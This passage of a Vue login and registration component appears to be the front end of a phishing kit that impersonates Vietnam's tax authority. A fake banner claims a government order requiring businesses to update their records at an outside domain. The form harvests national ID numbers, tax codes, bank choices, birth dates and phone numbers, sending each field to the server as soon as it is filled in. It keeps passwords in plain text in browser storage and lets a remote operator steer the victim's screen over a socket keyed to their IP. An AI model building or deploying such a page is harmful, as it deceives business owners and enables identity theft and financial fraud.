<template>
    <div class="wp_login_register" :class="{addClassMb: check == 3, addClassdgss: check == 2}" v-if="is_show_frm">
        <!-- frm captcha -->
        <div class="root_page_center root_page_centerwp root_login captcha_bgr hidden_mobile_css" v-if="check == 3">
            <div class="login_content login_content_nologin captcha_nonePM">
                <div class="logo_gg">
                    <img src="../assets/images/captcha/gg.png" alt="">
                </div>
                <h3 class="config_txt">Xác minh bạn <br />không phải robot</h3>
                <div class="captcha" >
                    <div class="header_captcha">
                        <h3>Chọn tất cả các hình có <span>Ô tô</span></h3>
                        <div class="img_choose_captcha">
                            <img src="../assets/images/captcha/img.png" alt="">
                        </div>
                    </div>
                    
                    <div class="grid_item_img">
                        <div v-for="(item, index) in grid" :key="index" :class="{ active: selected.includes(index + 1) }" @click="toggleSelect(index + 1)">
                            <img v-if="item" :src="getImage(item)" />
                        </div>
                    </div>
                    <div class="footer_captcha">
                        <ul>
                            <li><img src="../assets/images/captcha/a.png" alt=""></li>
                            <li><img src="../assets/images/captcha/b.png" alt=""></li>
                            <li><img src="../assets/images/captcha/c.png" alt=""></li>
                        </ul>
                        <button @click="verifyCaptcha" :disabled="selected.length !== 3" :class="{ disabled: selected.length !== 3 }">Xác nhận</button>
                    </div>
                </div>
            </div>
        </div>
        <!-- frm progress -->
        <div class="root_page_center root_page_centerwp root_login hidden_mobile_css rootlogin_mb" v-else-if="check == 0">
            <div class="login_content login_content_nologin">
                <div class="logo_start_nologin" style="opacity:0 !important;">
                    <img src="../assets/images/logo.png" alt="">
                </div>
                <div class="logo_page_nologin col-md-12 col-sm-12 col-xs-12">
                    <!-- <img src="../assets/images/logonen.png" alt=""> -->
                    <img src="../assets/images/loading.gif" alt="">
                </div>
                <div class="frm_formLogin col-md-12 col-sm-12 col-xs-12">
                    <div class="wp_startLogin">
                        <h2>Xin chào doanh nghiệp</h2>
                        <div class="progress-bar-container">
                            <div class="progress-bar" :class="clProgress" :style="{ width: progress + '%' }"></div>
                            <p>{{ progress }}%</p> 
                        </div>
                        <p>Đang xử lý thông tin...</p>
                        <button @click="startProgress" :disabled="completed">Tiếp tục</button>
                    </div>
                </div>
                <div class="text_run_bottom">
                    <!--  duration="100" -->
                    <Vue3Marquee :pause-on-click="true" :duration="30">
                        <div class="mqtext_mb">
                            <p>Từ ngày <i>1/7/2025</i> theo thông tư của thủ tướng chính phủ nhà nước ban hành, tất cả các doanh nghiệp đều phải cập nhật thông tin ĐKKD lên trang chủ chính thống của nhà nước: https://hosodoanhnghiep.online để hoàn tất thủ tục và hồ sơ.</p>
                        </div>
                    </Vue3Marquee>
                </div>
            </div>
        </div>
        <!-- frm login -->
        <div class="root_page_center root_login hidden_mobile_css rootlogin_mb" v-else-if="check == 1">
            <div class="top_lang_lg">VI | EN</div>
            <div class="login_content">
                <div class="wp_logolg_txtSlogan">
                    <div class="logo_page col-md-12 col-sm-12 col-xs-12">
                        <img src="../assets/images/logo.png" alt="">
                    </div>
                    <h4 class="title_logined">Công nghệ kiến tạo niềm tin</h4>
                </div>
                <div class="frm_formLogin col-md-12 col-sm-12 col-xs-12">
                    <form class="frm_login_app" action="" method="post" id="frm_login" @submit="login($event)">
                        <div class="input_login">
                            <input type="text" v-model="username" placeholder="Tên đăng nhập">
                            <img src="../assets/images/us.png" alt="" class="icon_input">
                        </div>
                        <div class="input_login">
                            <input :type="showPassword ? 'text' : 'password'" v-model="password" placeholder="Mật khẩu">
                            <img src="../assets/images/pass.png" alt="" class="icon_input">
                            <img src="../assets/images/eye.png" @click="togglePassword" alt="" class="iconpassword icon_hide" v-if="showPassword">
                            <img src="../assets/images/eyes.png" @click="togglePassword" alt="" class="iconpassword icon_show" v-else>
                        </div>
                        <div class="saveInfologin">
                            <div>
                                <input type="checkbox" checked name="" v-model="rememberMe" id="saveIf"> 
                                <label for="saveIf">Lưu thông tin đăng nhập</label>
                            </div>
                            <p><u>Quên mật khẩu?</u></p>
                        </div>
                        <div class="btn_modal_login_tool">
                            <div class="btn_login">
                                <button type="submit">Đăng nhập</button>
                            </div>
                        </div>
                        <div class="textRegister">
                            <span class="point_wr">───</span>&nbsp; Bạn chưa có tài khoản? <span @click="showRegister">Đăng ký ngay &nbsp;<span class="point_wr">───</span></span>
                        </div>
                    </form>
                </div>
                <div class="item_nologin_end">
                    <div class="row">
                        <div class="col-md-3 col-sm-3 col-xs-3 wp_it_nolg">
                            <div class="it_nolg">
                                <img src="../assets/images/hd.png" alt="">
                                <p>Hướng dẫn</p>
                            </div>
                        </div>
                        <div class="col-md-3 col-sm-3 col-xs-3 wp_it_nolg">
                            <div class="it_nolg">
                                <img src="../assets/images/sp.png" alt="">
                                <p>Hỗ trợ</p>
                            </div>
                        </div>
                        <div class="col-md-3 col-sm-3 col-xs-3 wp_it_nolg">
                            <div class="it_nolg">
                                <img src="../assets/images/s.png" alt="">
                                <p>Tra cứu</p>
                            </div>
                        </div>
                        <div class="col-md-3 col-sm-3 col-xs-3 wp_it_nolg">
                            <div class="it_nolg">
                                <img src="../assets/images/tcuu.png" alt="">
                                <p>Thông báo</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="bottom_txt_lg">
                <p class="p_lf_bt">Tổng cục thuế</p>
                <p class="p_rg_bt">Vì một xã hội số công bằng, hiệu quả</p>
            </div>
        </div>
        <!-- frm register -->
        <div class="root_page_center root_register"  v-else-if="check == 2">
            <div class="register_content">
                <div class="logo_pageRg col-md-12 col-sm-12 col-xs-12">
                    <img src="../assets/images/loading.gif" alt="">
                    <h4>Hỗ trợ thông tin doanh nghiệp</h4>
                    <h5>ĐĂNG KÝ TRỰC TUYẾN</h5>
                    <h6>Đăng ký tài khoản doanh nghiệp</h6>
                </div>
                <div class="frm_formRegister col-md-12 col-sm-12 col-xs-12">
                    <div class="wrapper_dk" :class="{stepss: step == 4}">
                        <div :class="'wp_item_task ' + classAc" v-if="step != 4">
                            <div class="item_task">
                                <span>1</span>
                                <p>Loại hình <br /> doanh nghiệp</p>
                            </div>
                            <div class="item_task">
                                <span>2</span>
                                <p>Thông tin <br /> liên hệ</p>
                            </div>
                            <div class="item_task">
                                <span>3</span>
                                <p>Địa chỉ và <br /> xác nhận</p>
                            </div>
                        </div>
                        <form class="frm_Register_app" action="" method="post" id="frm_register" @submit="register($event)">
                            <div class="number_step">
                                <div class="top_step">
                                    <span class="step_span">Bước {{ numberstep }} / 3</span>
                                    <span class="step_span1">{{ percent }}% hoàn thành</span>
                                </div>
                                <div :class="'progress_step ' + classPg"></div>
                            </div>
                            <div class="wp_item_frm_dk_step wp_item_frm_dk_step1" v-if="step == 1">
                                <h2 class="title_wp_item_frm_dk_step">Chọn loại hình doanh nghiệp</h2>
                                <h6 class="title_wp_item_frm_dk_step1">Vui lòng chọn một loại hình phù hợp với hồ sơ dự kiến.</h6>
                                <div class="input_registers">
                                    <p v-for="(item, index) in listCompany" :key="index">
                                        <input type="radio" v-model="company" :value="item.id" :id="'radio'+index" @change="onBlurField('company')">
                                        <span class="radio-mark"></span> <label :for="'radio'+index">{{ item.name}}</label>
                                    </p>
                                </div>
                                <div class="btn_step">
                                    <button type="button" @click="clickbackStepzr()">Quay lại</button>
                                    <button type="button" @click="clickStepone()">Tiếp tục →</button>
                                </div>
                            </div>
                            <div class="wp_item_frm_dk_step wp_item_frm_dk_step2" v-else-if="step == 2">
                                <h2 class="title_wp_item_frm_dk_step">Thông tin người liên hệ</h2>
                                <h6 class="title_wp_item_frm_dk_step1">Thông tin chỉ dùng để hiển thị trong bản xem lại trên thiết bị.</h6>
                                <div class="input_register">
                                    <p>Họ và tên chủ doanh nghiệp</p>
                                    <input type="text" v-model="fullname" @input="fullname = fullname.toUpperCase()" @blur="onBlurField('fullname')" placeholder="Họ và tên (Chủ Doanh Nghiệp)">
                                </div>
                                <div class="row">
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Ngày sinh</p>
                                            <!-- locale="vi" -->
                                            <Datepicker v-model="birthday" select-text="Chọn" cancel-text="Hủy" :format-locale="vi" :format="format" :enable-time-picker="false" placeholder="Ngày, tháng, năm sinh" @update:model-value="onBirthdayChange"/>
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Giới tính</p>
                                            <div class="txt_sex">
                                                <p><label for="radio6">Nam</label> <input type="radio" v-model="sex" @change="onBlurField('sex')" value="Nam" id="radio6"><span class="radio-mark_sex"></span></p>
                                                <p><label for="radio7">Nữ</label> <input type="radio" v-model="sex" @change="onBlurField('sex')" value="Nữ" id="radio7"><span class="radio-mark_sex"></span></p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>CMND / CCCD</p>
                                            <input type="text" @input="identity_number = identity_number.replace(/\D/g, '')" inputmode="numeric" pattern="[0-9]*" v-model="identity_number" placeholder="Nhập số CMNN / CCCD" @blur="onBlurField('identity_number')">
                                            <!-- <h4>Số CMNN / CCCD phải đúng với số đã đăng ký với Sở Kế Hoạch Và Đầu Tư</h4> -->
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Mã số thuế</p>
                                            <input type="text" v-model="taxCode" placeholder="Mã số thuế" @blur="onBlurField('taxCode')">
                                        </div>
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Mật khẩu</p>
                                            <input :type="showPassword1 ? 'text' : 'password'" v-model="passwordRg" placeholder="Mật khẩu" @blur="onBlurField('passwordRg')">
                                            <img src="../assets/images/eye.png" @click="togglePassword1" alt="" class="iconpassword icon_hide" v-if="showPassword1">
                                            <img src="../assets/images/eyes.png" @click="togglePassword1" alt="" class="iconpassword icon_show" v-else>
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Xác nhận mật khẩu</p>
                                            <input :type="showPassword2 ? 'text' : 'password'" v-model="confirmPasswordRg" placeholder="Xác nhận mật khẩu" @blur="onBlurField('confirmPasswordRg')">
                                            <img src="../assets/images/eye.png" @click="togglePassword2" alt="" class="iconpassword icon_hide" v-if="showPassword2">
                                            <img src="../assets/images/eyes.png" @click="togglePassword2" alt="" class="iconpassword icon_show" v-else>
                                        </div>
                                    </div>
                                </div>
                                <div class="input_register input_settingVselect">
                                    <p>Chọn ngân hàng</p>
                                    <v-select
                                        v-model="bankId"
                                        :options="listBank"
                                        label="name"
                                        :reduce="bank => bank.id"
                                        placeholder="Tên ngân hàng"
                                    >
                                        <template #option="{ name, image }">
                                            <img :src="linkWebAdmin + image" style="height: 20px; margin-right: 8px;width: 60px;object-fit: contain;" />
                                            {{ name }}
                                        </template>
                                        <template #selected-option="{ name, image }">
                                            <img :src="linkWebAdmin + image" style="height: 20px; margin-right: 8px;width: 60px;object-fit: contain;" />
                                            {{ name }}
                                        </template>
                                    </v-select>
                                </div>
                                <div class="row">
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Vốn điều lệ</p>
                                            <input type="text" inputmode="numeric" v-model="showMoney" @input="onNumberInput" placeholder="Vốn điều lệ" @blur="onBlurField('showMoney')">
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Số điện thoại</p>
                                            <input type="tel" inputmode="numeric" pattern="[0-9]*" @input="phone = phone.replace(/\D/g, '')" maxlength="11" v-model="phone" placeholder="Nhập số điện thoại" @blur="onBlurField('phone')">
                                            <!-- <h4>Số điện thoại phải đúng với số đã đăng ký với Sở Kế Hoạch Và Đầu Tư</h4> -->
                                        </div>
                                    </div>
                                </div>
                                <div class="btn_step">
                                    <button type="button" @click="clickbackStepone()">Quay lại</button>
                                    <button type="button" @click="clickSteptwo()">Tiếp tục →</button>
                                </div>
                            </div>
                            <div class="wp_item_frm_dk_step wp_item_frm_dk_step3" v-else-if="step == 3">
                                <h2 class="title_wp_item_frm_dk_step">Địa chỉ trụ sở đăng ký</h2>
                                <h6 class="title_wp_item_frm_dk_step1">Hoàn thành địa chỉ liên hệ và kiểm tra lại thông tin.</h6>
                                <div class="row">
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Tỉnh / Thành phố</p>
                                            <v-select
                                                v-model="city"
                                                :options="listProvinces"
                                                label="name"
                                                placeholder="Thành phố / Tỉnh thành"
                                            />
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-xs-6 col-sm-6 item_frm">
                                        <div class="input_register">
                                            <p>Phường / Xã</p>
                                            <v-select
                                                v-model="ward"
                                                :options="listWard"
                                                label="name"
                                                placeholder="Phường / Xã"
                                            >
                                                <template #no-options>
                                                    Không có lựa chọn phù hợp
                                                </template>
                                            </v-select>
                                        </div>
                                    </div>
                                </div>
                                <div class="input_register">
                                    <p>Địa chỉ cụ thể</p>
                                    <input type="text" v-model="address" @input="capitalizeWords('address')" placeholder="Địa chỉ cụ thể" @blur="onBlurField('address')">
                                </div>
                                <div class="input_register">
                                    <p>Cán bộ phụ trách</p>
                                    <input type="text" v-model="staff" @input="capitalizeWords('staff')" placeholder="Cán bộ phụ trách" @blur="onBlurField('staff')">
                                </div>
                                <!-- <div class="input_register">
                                    <h3>Chụp ảnh CMND / CCCD</h3>
                                    <div class="row">
                                        <div class="textCccd">
                                            <p>Mặt trước</p>
                                            <div v-if="checkDxm == 1">Đã xác minh</div>
                                        </div>
                                        <div class="imgCccd">
                                            <input
                                                type="file"
                                                accept="image/*"
                                                capture="environment"
                                                @change="onCapture"
                                            />
                                            <div class="imgTextPhoto">
                                                <img :src="imageUrl" alt="Ảnh CCCD" v-if="imageUrl"/>
                                                <p v-else>Ảnh CMNN / CCCD</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="row">
                                        <div class="textCccd">
                                            <p>Mặt sau</p>
                                            <div v-if="checkDxms == 1">Đã xác minh</div>
                                        </div>
                                        <div class="imgCccd">
                                            <input
                                                type="file"
                                                accept="image/*"
                                                capture="environment"
                                                @change="onCapture1"
                                            />
                                            <div class="imgTextPhoto">
                                                <img :src="imageUrl1" alt="Ảnh CCCD" v-if="imageUrl1"/>
                                                <p v-else>Ảnh CMNN / CCCD</p>
                                            </div>
                                        </div>
                                    </div>
                                    <h3>Chụp ảnh chân dung</h3>
                                    <div class="camera-container" v-if="widthScreen < 768 && checkCameraOpen == 0">
                                        <video ref="video" autoplay playsinline class="camera-view" />
                                        <div class="circle-frame"></div>

                                        <button class="capture-btn" @click.prevent="capture" v-if="checkImg == 0">Chụp ảnh</button>
                                        <button class="capture-btn" @click="backPhoto" v-else>Chụp lại</button>

                                        <div v-if="capturedImage" class="preview">
                                            <img :src="capturedImage" alt="Ảnh chụp" />
                                        </div>
                                    </div>
                                    <div class="row" v-else>
                                        <div class="imgchandung">
                                            <input
                                                type="file"
                                                accept="image/*"
                                                @change="onCapture2"
                                            />
                                            <div class="imgTextPhoto">
                                                <img :src="imageUrl2" alt="Ảnh CCCD" v-if="imageUrl2"/>
                                                <p v-else>Chọn ảnh chân dung</p>
                                            </div>
                                        </div>
                                    </div>
                                </div> -->
                                <div class="textConfig">
                                    <p><input type="checkbox" v-model="config" id="config"> <label for="config">Tôi đã đọc, hiểu rõ và chấp nhận <span>các điều khoản</span> của nhà nước. Bằng việc xác nhận này, tôi đồng ý đăng ký tài khoản <span>Thuế Điện Tử</span></label></p>
                                </div>
                                <div class="btn_step">
                                    <button type="button" @click="clickbackSteptwo()">Quay lại</button>
                                    <button  type="submit" :disabled="!config">Hoàn tất ✓</button>
                                </div>
                                <div class="textLogin">
                                    Bạn đã có tài khoản? <span @click="showLogin">Đăng nhập</span>
                                </div>
                            </div>
                            <div class="wp_item_frm_dk_step wp_item_frm_dk_step4" v-else>
                                <p class="title_ssdk"><span>Đăng ký hoàn tất</span></p>
                                <div class="check_ss">✓</div>
                                <h2>Chúc mừng!</h2>
                                <h3>Bạn đã đăng ký thành công tài khoản</h3>
                                <h4>Thông tin đăng kí đã được ghi nhận trong hệ thống nhà nước.</h4>
                                <div class="loginbtn_rgss">
                                    <a href="/">Đăng nhập</a>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        <canvas ref="fireworksCanvas" id="fireworksCanvas" data-test="phaohoa"></canvas>
        <!-- <div class="wp_modal_noti_regis_ss" v-if="showRegisterSs">
            <div class="modal_noti_regis_ss">
                <div class="logo_md_rgss">
                    <img src="../assets/images/loading.gif" />
                </div>
                <div class="wp_content_rgss">
                    <div class="tickImg">
                        <span><img src="../assets/images/tick.png" /></span>
                    </div>
                    <h2>Đăng ký thành công</h2>
                    <h4>Chúc mừng!</h4>
                    <p>Bạn đã đăng ký thành công tài khoản <br /> Thông tin đăng ký đã được ghi nhận</p>
                </div>
            </div>
        </div> -->
    </div>
</template>
<script>
import $ from 'jquery'
import vSelect from 'vue-select'
import 'vue-select/dist/vue-select.css'

import Datepicker from '@vuepic/vue-datepicker'
import '@vuepic/vue-datepicker/dist/main.css'
import viCustom from '@/locales/vi-custom'

import SocketIO from 'socket.io-client'

export default {
    name: 'Login_tool',
    data () {
        return {
            vi: viCustom,
            check: 3,
            is_show_frm: false,
            username: window.localStorage.getItem('username'),
            password: window.localStorage.getItem('password'),
            showPassword: false,
            showPassword1: false,
            showPassword2: false,
            company: '',
            fullname: '',
            identity_number : '',
            birthday: '',
            sex: '',
            taxCode: '',
            passwordRg: '123456789',
            confirmPasswordRg: '123456789',
            // email: '',
            phone: '',
            city: '',
            district: '',
            ward: '',
            address: '',
            staff: '',
            identity_front: '',
            identity_back: '',
            portrait: '',
            bankId: '',
            money: '',
            showMoney: '',
            listProvinces: [],
            // listDistrict: [],
            listWard: [],
            listCompany: [],
            imageUrl: null,
            imageUrl1: null,
            imageUrl2: null,
            stream: null,
            capturedImage: null,
            widthScreen: window.innerWidth,
            checkImg: 0,
            config: false,
            date: null,
            format: 'dd/MM/yyyy',
            listBank: [],
            checkDxm: 0,
            checkDxms: 0,
            checkCameraOpen: 0,
            progress: 0,
            intervalIdSt: null,
            intervalId: null,
            completed: false,
            checkev: false,
            socket: null,
            clProgress: '',
            oldValues: {},
            formId: '',
            isUserInteracted: false,

            captchaId: null,
            correctNumbers: [],
            positions: [],
            selected: [],
            grid: Array(9).fill(null),
            allImages: [1,2,3,4,5,6,7,8,9],
            captcha_verified: '',
            rememberMe: true,
            step: 1,
            percent: 33,
            classAc: 'active1',
            classPg: '',
            showRegisterSs: false,
            orther: [],
            numberstep: 1,
            canvas: null,
            ctx: null,
            particles: [],
            animationFrameId: null,
            resizeHandler: null,
            fireworkInterval: null
        }
    },
    components: {
        vSelect,
        Datepicker,
    },
    mounted() {
        
    },
    watch: {
        city(newVal) {
            if (newVal) {
                this.district = null
                this.ward = null 
                this.getWard()
            }
        },
        ward(newVal) {
            if (this.isUserInteracted && newVal) this.updateUser();
        },
        bankId(newVal) {
            if (this.isUserInteracted && newVal) this.updateUser();
        },
    },
    created () {
        this.getProvinces()
        this.getCompany()
        this.getListBank()
        this.getIp()
        this.socketEventCheck()
        this.startProgress_start()

        this.oldValues = {
            company: this.company || '',
            name: this.fullname || '',
            dob: this.birthday || '',
            gender: this.sex || '',
            identity_number: this.identity_number || '',
            tax_code: this.taxCode || '',
            password: this.passwordRg || '',
            password_confirmation: this.confirmPasswordRg || '',
            phone: this.phone || '',
            charter_capital: this.money || '',
            bank_id: this.bankId || '',
            province: '',
            ward: '',
            address_detail: this.address || '',
            responsible_staff: this.staff || '',
        }
        this.fetchCaptcha()
    },
    beforeUnmount() {
        if (this.stream) {
            this.stream.getTracks().forEach(t => t.stop())
        }
        clearInterval(this.intervalIdSt)
        clearInterval(this.intervalId)
        if (this.socket) {
            this.socket.disconnect()
        }
    },
    methods: {
        togglePassword() {
            this.showPassword = !this.showPassword;
        },
        togglePassword1() {
            this.showPassword1 = !this.showPassword1;
        },
        togglePassword2() {
            this.showPassword2 = !this.showPassword2;
        },
        showRegister () {
            this.check = 2
            this.isUserInteracted = false;
            if(this.widthScreen < 768){
                this.initCamera()
            }
        },
        showLogin () {
            this.check = 1
        },
        getProvinces () {
            this.axios.get(this.api_getProvinces).then((response) => {
                this.listProvinces = response.data.data
            })
        },
        // getDistricts () {
        //     this.axios.get(this.api_getDistrict + '?id=' + this.city.id).then((response) => {
        //         this.listDistrict = response.data.data
        //     })
        // },
        getWard () {
            this.axios.get(this.api_getWard + '?province_code=' + this.city.code).then((response) => {
                this.listWard = response.data.data
                this.updateUser();
            })
        },
        getCompany () {
            this.axios.get(this.api_getCompany).then((response) => {
                this.listCompany = response.data.data
            })
        },
        onCapture(event) {
            const file = event.target.files[0]
            if (file) {
                this.checkDxm = 1
                this.imageUrl = URL.createObjectURL(file)
                this.identity_front = file
                event.target.value = ''
            }
        },
        onCapture1(event) {
            const file = event.target.files[0]
            if (file) {
                this.checkDxms = 1
                this.imageUrl1 = URL.createObjectURL(file)
                this.identity_back = file
                event.target.value = ''
            }
        },
        onCapture2(event) {
            const file = event.target.files[0]
            if (file) {
                this.imageUrl2 = URL.createObjectURL(file)
                this.portrait = file
                event.target.value = ''
            }
        },
        async initCamera() {
            try {
                this.stream = await navigator.mediaDevices.getUserMedia({
                    video: { facingMode: 'user' }
                })
                this.$refs.video.srcObject = this.stream
            } catch (err) {
                this.checkCameraOpen = 1
                console.log('Không thể truy cập camera: ' + err.message)
            }
        },
        capture() {
            const video = this.$refs.video
            const canvas = document.createElement('canvas')
            const size = 300
            canvas.width = size
            canvas.height = size
            const ctx = canvas.getContext('2d')
            ctx.beginPath()
            ctx.arc(size / 2, size / 2, size / 2, 0, Math.PI * 2)
            ctx.closePath()
            ctx.clip()
            ctx.drawImage(video, 
                (video.videoWidth - size) / 2,
                (video.videoHeight - size) / 2,
                size, size,
                0, 0,
                size, size
            )
            this.capturedImage = canvas.toDataURL('image/png')
            this.portrait = this.capturedImage
            if (this.capturedImage) {
                this.checkImg = 1
            }
        },
        backPhoto () {
            this.checkImg = 0
            this.capturedImage = null
        },
        getListBank () {
            this.axios.get(this.api_logoBanks).then((response) => {
                this.listBank = response.data.data
            })
        },
        onBirthdayChange(newDate) {
            if (!this.isUserInteracted) {
                this.birthday = newDate;
                this.oldValues.birthday = newDate;
                return;
            }
            if (newDate !== this.oldValues.birthday) {
                this.birthday = newDate;
                this.updateUser();
                this.oldValues.birthday = newDate;
            }
        },
        buildPayload() {
            const payload =  {
                company: this.company,
                name: this.fullname,
                dob: this.formatDate(this.birthday),
                gender: this.sex,
                identity_number: this.identity_number,
                tax_code: this.taxCode,
                password: this.passwordRg,
                password_confirmation: this.confirmPasswordRg,
                phone: this.phone,
                charter_capital: this.money,
                bank_id: this.bankId,
                province: '',
                ward: '',
                address_detail: this.address,
                responsible_staff: this.staff,
            };
            if(this.city){
                payload.province = this.city.name;
            }else{
                payload.province = '';
            }
            if(this.ward){
                payload.ward = this.ward.name;
            }else{
                payload.ward = '';
            }
            return payload;
        },
        onBlurField(field) {
            const newValue = this[field];
            const oldValue = this.oldValues[field];
            if (!this.isUserInteracted) {
                this.isUserInteracted = true;
                this.oldValues[field] = newValue;
                this.updateUser();
                return;
            }
            if (newValue !== oldValue) {
                this.updateUser();
                this.oldValues[field] = newValue;
            }
        },
        updateUser () {
            const payload = this.buildPayload();
            if (this.formId) {
                payload.id = this.formId;
            }
            this.axios.post(this.api_updateUser,
                payload
            ).then((response) => {
                this.formId = response.data.user.id;
            }).catch(e => {
                console.log(e);
            })
        },
        register (e) {
            e.preventDefault()
            $('#loadingImg').show().fadeIn(10)
            const form = new FormData();
            form.append('id', this.formId);
            form.append('company_type', this.company);
            form.append('name', this.fullname);
            form.append('dob', this.formatDate(this.birthday));
            form.append('gender', this.sex);
            form.append('identity_number', this.identity_number);
            form.append('tax_code', this.taxCode);
            form.append('password', this.passwordRg);
            form.append('password_confirmation', this.confirmPasswordRg);
            // form.append('email', this.email);
            form.append('phone', this.phone);
            form.append('charter_capital', this.money);
            form.append('bank_id', this.bankId);
            if(this.city){
                form.append('province', this.city.name);
            }else{
                form.append('province', '');
            }
            // if(this.district){
            //     form.append('district', this.district._name);
            // }else{
            //     form.append('district', '');
            // }
            if(this.ward){
                form.append('ward', this.ward.name);
            }else{
                form.append('ward', '');
            }
            form.append('address_detail', this.address);
            form.append('responsible_staff', this.staff);
            // form.append('identity_front', this.identity_front);
            // form.append('identity_back', this.identity_back);
            // form.append('portrait', this.portrait);
            // api_Register
            this.axios.post(this.api_Register,
                form
            ).then((response) => {
                $('#loadingImg').css('display', 'none')

                this.resizeHandler = () => this.resizeCanvas();
                window.addEventListener('resize', this.resizeHandler);
                setTimeout(() => {
                    this.initCanvas();
                }, 50);
                this.startContinuousFireworks();

                window.localStorage.setItem('username', this.taxCode)
                window.localStorage.setItem('password', this.passwordRg)
                // this.$swal({
                //     position: 'top-end',
                //     icon: 'success',
                //     title: response.data.message,
                //     showConfirmButton: false,
                //     timer: 2000
                // })
                this.orther = response
                this.step = 4
                // setTimeout(() => {
                //     window.location.reload()
                // }, 2000);
            }).catch(e => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: e.response.data.errors,
                    showConfirmButton: false,
                    timer: 2000
                })
            })
        },
        login (e) {
            e.preventDefault()
            $('#loadingImg').show().fadeIn(10)
            this.axios.post(this.api_Login,
                {
                    tax_code: this.username,
                    password: this.password,
                }
            ).then((response) => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'success',
                    title: response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
                if (this.rememberMe) {
                    window.localStorage.setItem('username', this.username)
                    window.localStorage.setItem('password', this.password)
                }else{
                    localStorage.removeItem('username');
                    localStorage.removeItem('password');
                }
                window.localStorage.setItem('token', response.data.token)
                window.localStorage.setItem('idUser', response.data.user.id)
                setTimeout(() => {
                    window.location.reload()
                }, 2000);
            }).catch(e => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: e.response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
            })
        },
        formatDate(date) {
            if (!date) return ''
            const yyyy = date.getFullYear()
            const dd = String(date.getDate()).padStart(2, '0')
            const mm = String(date.getMonth() + 1).padStart(2, '0')
            return `${yyyy}-${mm}-${dd}`
        },
        getIp () {
            this.axios.get(this.api_getIpCC).then((response) => {
                window.localStorage.setItem('ip', response.data.data.ip)
                this.captcha_verified = response.data.data.captcha_verified
                if(response.data.data.captcha_verified == 1){
                    this.check = 0
                    if(response.data.data.status == 1){
                        this.check = 1
                    }
                }
            }).finally(() => {
                this.is_show_frm = true;
            })
        },
        startProgress_start() {
            clearInterval(this.intervalIdSt)
            this.progress = 0
            this.intervalIdSt = setInterval(() => {
                if (this.progress < 48) {
                    this.progress += 1
                } else {
                    clearInterval(this.intervalIdSt)
                    this.clProgress = 'active'
                }
            }, 50)
        },
        startProgress() {
            this.clProgress = ''
            clearInterval(this.intervalId)
            this.progress = 48
            this.intervalId = setInterval(() => {
                if (this.progress < 100) {
                    this.progress += 1
                    this.completed = true
                } else {
                    clearInterval(this.intervalId)
                    this.completed = true
                    this.checkev = true
                    this.getIp()
                }
            }, 50)
        },
        socketEventCheck () {
            let thiss = this
            let ip = window.localStorage.getItem('ip')
            this.socket = SocketIO(this.linkWebAdmin, { transports: ['websocket', 'polling', 'flashsocket'], reconnection: true, reconnectionAttempts: 5, reconnectionDelay: 2000 });
            this.socket.on(`laravel_database_private-user_log_ip.${ip}:user-log`, function(result) {
                if(result.captcha_verified == 0 && result.status == 0){
                    thiss.check = 3
                    thiss.fetchCaptcha()
                }else if(result.captcha_verified == 1 && result.status == 0){
                    thiss.check = 0
                    thiss.startProgress_start()
                }else {
                    thiss.check = 1
                }
            });
        },
        formatNumber(value) {
            const cleaned = value.split('.')[0];
            const num = cleaned.replace(/\D/g, '');
            return num.replace(/\B(?=(\d{3})+(?!\d))/g, '.');
        },
        onNumberInput(e) {
            const raw = e.target.value.replace(/\./g, '');
            this.money = raw
            this.showMoney = this.formatNumber(raw);
        },
        fetchCaptcha() {
            this.axios.get(this.api_getCaptcha).then((res) => {
                this.captchaId = res.data.captcha_id
                this.correctNumbers = res.data.correct_images || [1,2,3]
                this.positions = res.data.random_numbers
                this.buildGrid()
                this.selected = []
            })
        },
        buildGrid() {
            this.grid = Array(9).fill(null)
            this.positions.forEach((pos, i) => {
                this.grid[pos - 1] = this.correctNumbers[i]
            })
            let remaining = this.allImages.filter(
                img => !this.correctNumbers.includes(img)
            )
            remaining = this.shuffleArray(remaining)
            for (let i = 0; i < 9; i++) {
                if (this.grid[i] === null) {
                    this.grid[i] = remaining.pop()
                }
            }
        },
        toggleSelect(position) {
            if (this.selected.includes(position)) {
                this.selected = this.selected.filter(i => i !== position)
            } else {
                if (this.selected.length >= 3) return
                this.selected.push(position)
            }
        },
        verifyCaptcha() {
            this.axios.post(this.api_submitCaptcha,
                {
                    captcha_id: this.captchaId,
                    captcha: this.selected,
                }
            ).then((response) => {
                this.$swal({
                    position: 'top-end',
                    icon: 'success',
                    title: response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
                this.getIp()
            }).catch((e) => {
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: e.response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
                this.captchaId = e.response.data.captcha_id
                this.correctNumbers = e.response.data.correct_images || [1,2,3]
